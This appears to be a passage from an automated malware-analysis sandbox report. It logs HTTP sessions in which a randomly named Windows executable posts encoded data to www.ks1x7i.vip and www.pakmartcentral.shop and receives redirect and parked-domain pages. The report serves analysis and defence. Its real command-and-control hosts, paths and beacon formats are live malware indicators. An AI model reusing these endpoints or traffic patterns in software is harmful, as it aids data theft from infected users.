                                                                                                            Data Ascii: EjLdUJJ=9uXoZFMaf5MxH1zAyLp6zfdGh7SG67lNvqHcHAgbuc+c639boxDEfCzd2kx35h7TPuQduXRqrDHDiaFtF8lhyBQy2nF/lbTQH0eoMWizewoM8Ck0zwhV6uUBOjo6hmLIeB371dd+RVlNHzy5gveMqFNasC4Vkczh8kxkhifQvR3Lp42IH1e59ksmD/5G


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            30192.168.2.9500053.33.130.190806568C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Oct 7, 2024 15:57:09.798033953 CEST686OUTPOST /uxh9/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 220
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: www.ks1x7i.vip
                                                                                                            Origin: http://www.ks1x7i.vip
                                                                                                            Referer: http://www.ks1x7i.vip/uxh9/
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                                                            Data Raw: 45 6a 4c 64 55 4a 4a 3d 39 75 58 6f 5a 46 4d 61 66 35 4d 78 46 56 6a 41 2b 4d 39 36 31 2f 64 4a 6b 37 53 47 30 72 6c 4a 76 71 4c 63 48 42 56 41 74 6f 53 63 36 53 42 62 70 30 6a 45 4b 43 7a 64 75 30 78 79 6d 78 37 59 50 75 63 37 75 54 52 71 72 44 54 44 69 61 31 74 46 76 64 2b 77 52 51 30 36 48 46 39 6f 37 54 51 48 30 65 6f 4d 57 33 55 65 32 41 4d 38 79 30 30 7a 55 31 57 7a 4f 55 47 4a 6a 6f 36 6c 6d 4c 45 65 42 32 4c 31 63 78 59 52 58 64 4e 48 78 36 35 75 65 65 50 68 46 4e 51 78 79 34 4c 6a 70 76 73 79 69 52 61 6e 79 7a 56 37 78 58 69 6e 35 57 57 57 48 58 69 6f 7a 73 42 45 59 77 75 71 63 32 66 47 6f 4e 6e 79 73 63 4f 63 31 74 4b 6f 53 62 32 32 77 3d 3d
                                                                                                            Data Ascii: EjLdUJJ=9uXoZFMaf5MxFVjA+M961/dJk7SG0rlJvqLcHBVAtoSc6SBbp0jEKCzdu0xymx7YPuc7uTRqrDTDia1tFvd+wRQ06HF9o7TQH0eoMW3Ue2AM8y00zU1WzOUGJjo6lmLEeB2L1cxYRXdNHx65ueePhFNQxy4LjpvsyiRanyzV7xXin5WWWHXiozsBEYwuqc2fGoNnyscOc1tKoSb22w==


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            31192.168.2.9500063.33.130.190806568C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Oct 7, 2024 15:57:12.343573093 CEST1699OUTPOST /uxh9/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 1232
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: www.ks1x7i.vip
                                                                                                            Origin: http://www.ks1x7i.vip
                                                                                                            Referer: http://www.ks1x7i.vip/uxh9/
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                                                            Data Raw: 45 6a 4c 64 55 4a 4a 3d 39 75 58 6f 5a 46 4d 61 66 35 4d 78 46 56 6a 41 2b 4d 39 36 31 2f 64 4a 6b 37 53 47 30 72 6c 4a 76 71 4c 63 48 42 56 41 74 70 47 63 37 67 35 62 6f 53 72 45 59 79 7a 64 6d 55 78 7a 6d 78 37 2f 50 75 55 6e 75 54 56 51 72 42 72 44 67 35 39 74 53 75 64 2b 71 42 51 30 79 6e 46 67 6c 62 53 53 48 30 4f 6b 4d 57 6e 55 65 32 41 4d 38 30 77 30 30 41 68 57 2f 75 55 42 4f 6a 70 6f 68 6d 4b 74 65 42 75 39 31 63 31 75 51 6e 39 4e 45 52 4b 35 73 6f 43 50 6f 46 4e 65 68 69 35 59 6a 70 71 73 79 6a 35 38 6e 79 47 79 37 79 48 69 6e 39 6e 62 4d 44 48 41 38 68 67 49 54 5a 6b 78 67 4b 32 58 47 63 67 6b 72 4a 64 75 44 6c 78 63 67 6d 79 43 6d 2b 37 51 32 6e 31 39 30 69 48 54 62 66 51 54 73 6c 2b 33 2b 35 5a 4e 64 31 66 54 6e 67 63 54 6e 68 79 79 43 55 6a 64 61 70 69 78 37 72 6d 38 41 50 74 72 75 33 31 72 72 63 6e 33 39 47 51 65 5a 66 5a 33 75 6f 4f 45 71 64 59 6e 53 6f 77 4e 4f 31 65 37 66 6c 7a 68 70 55 77 4e 56 64 38 47 6d 56 78 6f 48 54 49 4c 37 67 74 48 68 5a 70 54 6e 6d 72 37 6e 73 6a 42 51 43 [TRUNCATED]
                                                                                                            Data Ascii: EjLdUJJ=9uXoZFMaf5MxFVjA+M961/dJk7SG0rlJvqLcHBVAtpGc7g5boSrEYyzdmUxzmx7/PuUnuTVQrBrDg59tSud+qBQ0ynFglbSSH0OkMWnUe2AM80w00AhW/uUBOjpohmKteBu91c1uQn9NERK5soCPoFNehi5Yjpqsyj58nyGy7yHin9nbMDHA8hgITZkxgK2XGcgkrJduDlxcgmyCm+7Q2n190iHTbfQTsl+3+5ZNd1fTngcTnhyyCUjdapix7rm8APtru31rrcn39GQeZfZ3uoOEqdYnSowNO1e7flzhpUwNVd8GmVxoHTIL7gtHhZpTnmr7nsjBQCYztCf2tqYoXB9ADYqVSoDb85XVyc3LEoqUbL7ixg6p9I861DAGOJaD3oVKfKZGfaAgNvegwWr0SzJOxRxEMhEKZeWP3R08tRj5UR0lg0CVFUKzcZlRmwMShq0L0QuA0/jOeJVjVbZSC/NwSufSSZIIcaLCrtui3bnlOqx5ZhHhw0Y06daz1i/hnjeB60bIRaDmS8juTD5nSzKCSq+nULrAp6UnU/Or2c0J7ILl4pheO+Lx6/ZT+wrQonUFXw1kLuSJWPZ5v7/mGeFtiLwTTplnXCkZlSVhOP26uTXsKCjhKSoVBeN4pK1/LuzcwI5mcwtJOvOkdfEzWvV4zX9JZS23dowLShwCRyDOAywT05A5X2qDd+SNFn8yecaO6katCJ5YXF/E8YV54H93C2JAoPxeYdFHDEodg7IJG7CiuZRk8ioGj3ULp8p1wVHlfSOYYjBjXEo77bCxJASJ+8NSfKlhDzp9Z4R5f9g4Xk+MrmDh5hT69UPr2J9eU+k7IOoQEqw8DyB2a55H26fRLtZYgK4Y4B1mjc4SH+3SkqagsbhQG/WGbp0GU8/LsfBOVsGltEdFyvQq6YnDruH4orxuAdivZid+bSIjM147HhbT5+f1hhpcMhsWizE3YNFFt316usL2QziWQS2x9Txq0JphohPQGbHjAdopvpLZ [TRUNCATED]


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            32192.168.2.9500073.33.130.190806568C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Oct 7, 2024 15:57:15.079993963 CEST410OUTGET /uxh9/?WLUDu=SXq8yrvPVd3tf&EjLdUJJ=ws/IawdEHaoWNg/j/7Jh7udGjrT+7JNe46jOTwFB35qywQtlsi2lBgTXskhK1RztBb48nT9+3zT3nLR+G4pW1yQztlFWqraTHnGITGOJIT5K53AYpg== HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Host: www.ks1x7i.vip
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                                                            Oct 7, 2024 15:57:15.518826008 CEST399INHTTP/1.1 200 OK
                                                                                                            Server: openresty
                                                                                                            Date: Mon, 07 Oct 2024 13:57:15 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 259
                                                                                                            Connection: close
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 57 4c 55 44 75 3d 53 58 71 38 79 72 76 50 56 64 33 74 66 26 45 6a 4c 64 55 4a 4a 3d 77 73 2f 49 61 77 64 45 48 61 6f 57 4e 67 2f 6a 2f 37 4a 68 37 75 64 47 6a 72 54 2b 37 4a 4e 65 34 36 6a 4f 54 77 46 42 33 35 71 79 77 51 74 6c 73 69 32 6c 42 67 54 58 73 6b 68 4b 31 52 7a 74 42 62 34 38 6e 54 39 2b 33 7a 54 33 6e 4c 52 2b 47 34 70 57 31 79 51 7a 74 6c 46 57 71 72 61 54 48 6e 47 49 54 47 4f 4a 49 54 35 4b 35 33 41 59 70 67 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?WLUDu=SXq8yrvPVd3tf&EjLdUJJ=ws/IawdEHaoWNg/j/7Jh7udGjrT+7JNe46jOTwFB35qywQtlsi2lBgTXskhK1RztBb48nT9+3zT3nLR+G4pW1yQztlFWqraTHnGITGOJIT5K53AYpg=="}</script></head></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            33192.168.2.95000884.32.84.32806568C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Oct 7, 2024 15:57:20.851960897 CEST689OUTPOST /ml5l/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 196
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: www.pakmartcentral.shop
                                                                                                            Origin: http://www.pakmartcentral.shop
                                                                                                            Referer: http://www.pakmartcentral.shop/ml5l/
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                                                            Data Raw: 45 6a 4c 64 55 4a 4a 3d 6e 31 56 6c 53 56 6e 6a 50 68 47 56 4d 37 57 47 75 44 41 78 58 63 30 61 6c 52 4e 44 38 66 64 35 44 69 36 35 78 64 2f 5a 58 78 48 67 31 6b 2f 46 7a 6e 62 4b 75 5a 4c 4a 44 41 4e 6d 74 75 59 37 48 4d 39 71 64 55 54 74 31 37 48 34 4d 5a 57 72 63 35 6e 32 6a 76 74 47 61 6c 47 33 48 4a 59 67 55 6b 77 69 44 4e 6f 46 4a 6a 30 46 53 32 33 33 53 54 4b 70 48 71 32 47 78 48 6b 30 68 4a 4b 6a 41 4a 62 44 48 61 42 42 72 69 66 77 55 61 7a 4f 55 47 50 6a 72 59 4e 6b 44 66 56 2f 34 59 49 61 48 6a 62 78 42 2f 6f 4c 54 4a 6d 70 63 68 53 70 33 54 7a 39 78 65 7a 54 46 66 35 4c
                                                                                                            Data Ascii: EjLdUJJ=n1VlSVnjPhGVM7WGuDAxXc0alRND8fd5Di65xd/ZXxHg1k/FznbKuZLJDANmtuY7HM9qdUTt17H4MZWrc5n2jvtGalG3HJYgUkwiDNoFJj0FS233STKpHq2GxHk0hJKjAJbDHaBBrifwUazOUGPjrYNkDfV/4YIaHjbxB/oLTJmpchSp3Tz9xezTFf5L


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            34192.168.2.95000984.32.84.32806568C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Oct 7, 2024 15:57:24.300533056 CEST713OUTPOST /ml5l/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 220
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: www.pakmartcentral.shop
                                                                                                            Origin: http://www.pakmartcentral.shop
                                                                                                            Referer: http://www.pakmartcentral.shop/ml5l/
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                                                            Data Raw: 45 6a 4c 64 55 4a 4a 3d 6e 31 56 6c 53 56 6e 6a 50 68 47 56 4e 62 6d 47 74 6b 73 78 51 38 30 5a 70 78 4e 44 31 2f 64 31 44 69 6d 35 78 59 66 4a 58 6a 54 67 30 42 44 46 30 6d 62 4b 70 5a 4c 4a 45 77 4e 76 69 4f 59 6b 48 4d 35 49 64 56 44 74 31 2f 76 34 4d 59 6d 72 63 4f 7a 31 6a 2f 74 54 50 31 47 31 45 35 59 67 55 6b 77 69 44 4e 56 6f 4a 6a 73 46 53 48 6e 33 64 52 69 71 42 61 32 46 68 58 6b 30 6c 4a 4b 76 41 4a 62 68 48 62 64 72 72 6b 62 77 55 62 44 4f 56 54 6a 69 68 59 4e 6d 48 66 55 4c 7a 49 46 51 48 77 58 4a 4b 39 55 5a 43 62 33 4d 66 41 79 33 6d 68 36 6d 6b 4a 7a 30 43 34 77 6a 71 33 67 31 34 4e 31 55 31 78 45 6c 6a 54 48 65 73 6b 43 51 58 41 3d 3d
                                                                                                            Data Ascii: EjLdUJJ=n1VlSVnjPhGVNbmGtksxQ80ZpxND1/d1Dim5xYfJXjTg0BDF0mbKpZLJEwNviOYkHM5IdVDt1/v4MYmrcOz1j/tTP1G1E5YgUkwiDNVoJjsFSHn3dRiqBa2FhXk0lJKvAJbhHbdrrkbwUbDOVTjihYNmHfULzIFQHwXJK9UZCb3MfAy3mh6mkJz0C4wjq3g14N1U1xEljTHeskCQXA==


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            35192.168.2.95001084.32.84.32806568C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Oct 7, 2024 15:57:26.892824888 CEST1726OUTPOST /ml5l/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 1232
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: www.pakmartcentral.shop
                                                                                                            Origin: http://www.pakmartcentral.shop
                                                                                                            Referer: http://www.pakmartcentral.shop/ml5l/
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                                                            Data Raw: 45 6a 4c 64 55 4a 4a 3d 6e 31 56 6c 53 56 6e 6a 50 68 47 56 4e 62 6d 47 74 6b 73 78 51 38 30 5a 70 78 4e 44 31 2f 64 31 44 69 6d 35 78 59 66 4a 58 6a 4c 67 31 33 33 46 79 46 6a 4b 6f 5a 4c 4a 48 77 4e 71 69 4f 5a 34 48 49 64 4d 64 56 50 54 31 39 58 34 4b 36 75 72 58 66 7a 31 70 2f 74 54 4e 31 47 34 48 4a 5a 39 55 6b 67 6d 44 4a 31 6f 4a 6a 73 46 53 45 76 33 5a 44 4b 71 61 61 32 47 78 48 6b 67 68 4a 4c 47 41 4a 6a 4c 48 61 70 52 73 55 37 77 56 34 37 4f 58 68 62 69 74 59 4e 6f 41 66 55 54 7a 49 4a 54 48 77 4c 72 4b 39 4d 2f 43 5a 6e 4d 4a 6b 65 71 35 69 44 2b 34 35 37 38 41 4a 64 4b 73 43 67 7a 39 70 30 55 6b 7a 6c 44 36 43 76 51 6a 77 72 61 50 64 6b 66 78 56 75 5a 30 75 59 79 38 6c 64 39 30 45 70 34 2f 7a 6a 76 67 70 43 67 74 61 4c 77 72 72 68 56 39 43 66 51 38 48 71 4e 57 46 34 35 73 45 34 59 69 4d 68 30 64 75 62 5a 77 66 71 72 4d 68 55 4f 72 78 4e 58 46 2b 73 4b 6c 6d 50 6f 4b 55 49 61 47 64 36 79 6f 4f 35 53 43 49 79 54 31 44 58 58 4c 4a 42 55 70 2b 79 57 54 4c 6c 4a 66 57 4d 6b 6a 5a 77 59 57 41 [TRUNCATED]
                                                                                                            Data Ascii: EjLdUJJ=n1VlSVnjPhGVNbmGtksxQ80ZpxND1/d1Dim5xYfJXjLg133FyFjKoZLJHwNqiOZ4HIdMdVPT19X4K6urXfz1p/tTN1G4HJZ9UkgmDJ1oJjsFSEv3ZDKqaa2GxHkghJLGAJjLHapRsU7wV47OXhbitYNoAfUTzIJTHwLrK9M/CZnMJkeq5iD+4578AJdKsCgz9p0UkzlD6CvQjwraPdkfxVuZ0uYy8ld90Ep4/zjvgpCgtaLwrrhV9CfQ8HqNWF45sE4YiMh0dubZwfqrMhUOrxNXF+sKlmPoKUIaGd6yoO5SCIyT1DXXLJBUp+yWTLlJfWMkjZwYWAqSjS2AFLroS+21b3z5yjEplDZlNt3Y7s9F5iTtS9nWGcf2ZwkujgqEVqSviMV2Ectf27KUej1p5XF6Xp2LrS6FKKOkFlyttMZrVKPgfGGr30ZVjIeZPMURdxIFsBd9til5TX7cJ1l5u4J7/mIch/HsGymgYyrpQQCjKA5WWa498I6LgQyy8hz7uBOnUdAt2Lp2N4vS3w3zOJbAliSWxr4tEfX8pWIiRIyBaJJxLFXYVtve6hUiYNoJdmYS5l2qOqIkvCl78RGxOBuWRlBAI/Z3sQoWHFMau0jZyMOv1Dm1PY3lN0eBy0WMAYJbCtSogIOeIpJNFnstx+SNll/EHay7/44Aoby6jxg9Sb6UEJDzzMFLIoeEstUJK0vC9IRKQlQFJdTvAiAdsAfvqdjCwJpA3vAjWJxqwXzF7Q8P6hkUWuZLAFFmwtWZP4Yyg1Fp9BpZZSaPQGzcdAnM7PBWtDOTzJ2P7axLAutR3EglVU1vv964hmuVhK8TE0ZqSLByZZbQtSLMm33w+W3oDBzIUF/D5u0X6jyJ2l8TjUmPP0u7hucoExFy20cGNBwO49hWd+KDNqoFMJd6trx5eWER7wdJUM10NNnkrKq1n8ivOPLONSaNeS97YzX7EfByTECZRMzShQnld88sGaYhBn2pUxlbZtfebqTVUleN [TRUNCATED]


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            36192.168.2.95001184.32.84.32806568C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Oct 7, 2024 15:57:29.430828094 CEST419OUTGET /ml5l/?EjLdUJJ=q39FRlrjXh2BAZ2an0Y0b+wnoW9u3vRxeQ2ev9PxWnLSwGTc53vym4zMKhd+m8E/J85vcAPus+7jLKqTLJL7q40+dEWWJZUlJWs+YYUwQiQqX1T+EQ==&WLUDu=SXq8yrvPVd3tf HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Host: www.pakmartcentral.shop
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                                                            Oct 7, 2024 15:57:29.867510080 CEST1236INHTTP/1.1 200 OK
                                                                                                            Server: hcdn
                                                                                                            Date: Mon, 07 Oct 2024 13:57:29 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 10072
                                                                                                            Connection: close
                                                                                                            Vary: Accept-Encoding
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            x-hcdn-request-id: c359f9007fa76b5b1a72c1b9e8473055-bos-edge1
                                                                                                            Expires: Mon, 07 Oct 2024 13:57:28 GMT
                                                                                                            Cache-Control: no-cache
                                                                                                            Accept-Ranges: bytes
                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                                                            Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"
                                                                                                            Oct 7, 2024 15:57:29.867527962 CEST1236INData Raw: 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61
                                                                                                            Data Ascii: Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600
                                                                                                            Oct 7, 2024 15:57:29.867538929 CEST1236INData Raw: 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65
                                                                                                            Data Ascii: x;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-c
                                                                                                            Oct 7, 2024 15:57:29.867597103 CEST1236INData Raw: 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f
                                                                                                            Data Ascii: r:#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-
                                                                                                            Oct 7, 2024 15:57:29.867607117 CEST1236INData Raw: 65 6c 63 6f 6d 65 2f 69 6d 61 67 65 73 2f 68 6f 73 74 69 6e 67 65 72 2d 6c 6f 67 6f 2e 73 76 67 20 61 6c 74 3d 48 6f 73 74 69 6e 67 65 72 20 77 69 64 74 68 3d 31 32 30 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c
                                                                                                            Data Ascii: elcome/images/hostinger-logo.svg alt=Hostinger width=120></a></div><div class="collapse navbar-collapse" id=myNavbar><ul class="nav navbar-links navbar-nav navbar-right"><li><a href=https://www.hostinger.com/tutorials rel=nofollow><i aria-hidd
                                                                                                            Oct 7, 2024 15:57:29.867618084 CEST1236INData Raw: 78 20 63 6f 6c 75 6d 6e 2d 77 72 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 63 6f 6c 2d 73 6d 2d 34 20 63 6f 6c 75 6d 6e 2d 63 75 73 74 6f 6d 2d 77 72 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6c 75 6d
                                                                                                            Data Ascii: x column-wrap"><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title><span style=margin-right:8px>Buy website hosting </span><span class=badge>Save 90%</span></div><br><p>Extremely fast, secure and
                                                                                                            Oct 7, 2024 15:57:29.867628098 CEST776INData Raw: 28 29 7b 74 68 69 73 2e 75 74 66 31 36 3d 7b 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 66 6f 72 28 76 61 72 20 72 2c 65 2c 6e 3d 5b 5d 2c 74 3d 30 2c 61 3d 6f 2e 6c 65 6e 67 74 68 3b 74 3c 61 3b 29 7b 69 66 28 35 35 32 39 36 3d 3d
                                                                                                            Data Ascii: (){this.utf16={decode:function(o){for(var r,e,n=[],t=0,a=o.length;t<a;){if(55296==(63488&(r=o.charCodeAt(t++)))){if(e=o.charCodeAt(t++),55296!=(64512&r)||56320!=(64512&e))throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence");r=((1023
                                                                                                            Oct 7, 2024 15:57:29.867640018 CEST1236INData Raw: 29 7d 74 68 69 73 2e 64 65 63 6f 64 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 61 2c 68 2c 66 2c 69 2c 63 2c 75 2c 64 2c 6c 2c 70 2c 67 2c 73 2c 43 2c 77 2c 76 2c 6d 3d 5b 5d 2c 79 3d 5b 5d 2c 45 3d 65 2e 6c 65 6e 67 74 68 3b 66
                                                                                                            Data Ascii: )}this.decode=function(e,t){var a,h,f,i,c,u,d,l,p,g,s,C,w,v,m=[],y=[],E=e.length;for(a=128,f=0,i=72,(c=e.lastIndexOf("-"))<0&&(c=0),u=0;u<c;++u){if(t&&(y[m.length]=e.charCodeAt(u)-65<26),128<=e.charCodeAt(u))throw new RangeError("Illegal input
                                                                                                            Oct 7, 2024 15:57:29.867793083 CEST984INData Raw: 28 6d 2d 39 37 3c 32 36 29 3c 3c 35 29 2b 28 28 21 77 5b 64 5d 26 26 6d 2d 36 35 3c 32 36 29 3c 3c 35 29 29 3a 74 5b 64 5d 29 29 3b 66 6f 72 28 69 3d 63 3d 79 2e 6c 65 6e 67 74 68 2c 30 3c 63 26 26 79 2e 70 75 73 68 28 22 2d 22 29 3b 69 3c 76 3b
